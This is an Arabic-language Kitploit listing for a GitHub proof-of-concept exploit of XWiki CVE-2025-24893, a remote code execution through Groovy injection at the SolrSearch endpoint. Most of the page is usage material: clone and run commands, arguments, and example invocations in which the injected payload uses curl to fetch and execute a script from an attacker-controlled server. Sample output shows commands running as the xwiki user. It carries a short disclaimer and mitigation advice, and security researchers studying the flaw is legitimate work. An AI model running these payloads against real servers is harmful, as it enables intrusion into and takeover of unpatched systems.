Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
xwiki-cve-2025-24893-poc — إثبات المفهوم لـ CVE-2025-24893 | Kitploit
أدوات/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعد
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

إثبات المفهوم لـ CVE-2025-24893

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
31منذ سنة واحدةلم تتم المراجعة بعد

XWiki RCE Exploit PoC (CVE-2025-24893)

نظرة عامة

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال ثغرة تنفيذ الأوامر عن بُعد (RCE) في XWiki والمعروفة باسم CVE-2025-24893. تسمح هذه الثغرة لمهاجم بتنفيذ كود عشوائي على نسخة مستهدفة من XWiki عن طريق استغلال طلب مُعدَّل إلى نقطة النهاية SolrSearch. يدعم هذا السكريبت أهداف HTTP و HTTPS على حدٍ سواء.

⚠️ إخلاء المسؤولية: إثبات المفهوم هذا مخصص للأغراض التعليمية والبحثية فقط. الاستخدام غير المصرح به لهذا الكود ضد أنظمة دون إذن صريح هو أمر غير قانوني وغير أخلاقي. احصل دائمًا على التصريح المناسب قبل اختبار أي نظام.

تفاصيل الثغرة

  • معرف CVE: CVE-2025-24893
  • المكون المتأثر: نقطة نهاية SolrSearch في XWiki
  • التأثير: تنفيذ الأوامر عن بُعد (RCE)
  • النشرة الأمنية: GitHub Security Advisory

تنشأ الثغرة بسبب المعالجة غير السليمة لمدخلات المستخدم في نقطة نهاية SolrSearch، مما يسمح بحقن كود Groovy عبر حمولة معدَّلة. يوضح إثبات المفهوم هذا كيف يمكن للمهاجم استغلال ذلك لتنفيذ أوامر عشوائية على الخادم المستهدف.

المتطلبات الأساسية

  • Python 3.x
  • مكتبات Python المطلوبة: requests، argparse، urllib.parse، re، html
  • نسخة XWiki مستهدفة معرضة للثغرة CVE-2025-24893
  • خادم يتحكم به المهاجم لاستضافة السكريبت bash، يجب أن يكون متاحًا عبر HTTP أو HTTPS
  • ملف يحتوي على الكود المراد تنفيذه على الهدف

التثبيت

  1. استنساخ هذا المستودع:
    root@kitploit:~
    git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
    
  2. تثبيت مكتبات Python المطلوبة:
    root@kitploit:~
    pip install requests
    

الاستخدام

يقوم السكريبت بإرسال طلب HTTP/HTTPS معدَّل إلى نسخة XWiki المستهدفة، حاقنًا حمولة Groovy تنفذ أمر curl لجلب وتشغيل ملف من خادم يتحكم به المهاجم.

قم بتشغيل السكريبت بالأمر التالي:

root@kitploit:~
python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]

الوسائط

  • --url: عنوان URL الأساسي لنسخة XWiki المستهدفة (مثل http://target أو https://target).
  • --server: عنوان IP أو اسم المضيف لخادم المهاجم، مع تضمين المنفذ إذا لزم الأمر (مثل 192.168.1.100:8080). يدعم كلاً من HTTP و HTTPS.
  • --file: اسم الملف الموجود على خادم المهاجم والذي يحتوي على الكود المراد تنفيذه (مثل exploit.sh).
  • --no-verify: علامة اختيارية لتعطيل التحقق من SSL لأهداف HTTPS (استخدم بحذر، للاختبار فقط).

مثال

root@kitploit:~
python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh

لتجاوز التحقق من SSL (مثل الشهادات ذاتية التوقيع):

root@kitploit:~
python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify

سينتج عن ذلك:

  1. إنشاء حمولة تستخدم سكريبت Groovy لتنفيذ أمر curl.
  2. جلب الملف المحدد (exploit.sh) من خادم المهاجم (http(s)://192.168.1.100:8080).
  3. تنفيذ الملف الذي تم جلبه على النظام المستهدف.
  4. استخراج وعرض المخرجات مع تنظيف أي وسوم HTML وكيانات.

المخرجات

يقوم السكريبت باستخراج الرد من الهدف، وإزالة وسوم HTML (مثل <br/>، <del>)، وتحويل كيانات HTML إلى نص عادي لسهولة القراءة. يتم طباعة المخرجات المنظفة على وحدة التحكم.

نموذج

root@kitploit:~
python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

القيود

  • يجب أن تكون نسخة XWiki المستهدفة معرضة للثغرة CVE-2025-24893.
  • يجب أن يكون خادم المهاجم متاحًا من النظام المستهدف عبر HTTP أو HTTPS.
  • يفترض السكريبت أن الخادم المستهدف يدعم نقطة نهاية SolrSearch وتنفيذ Groovy.

التخفيف

للحماية من هذه الثغرة:

  • قم بتحديث XWiki إلى أحدث إصدار مصحح.
  • راجع النشرة الأمنية على GitHub للحصول على خطوات التخفيف التفصيلية.
  • مدونة مرجعية حول CVE-2025-24893

الترخيص

هذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للحصول على التفاصيل.

تنزيل الأداة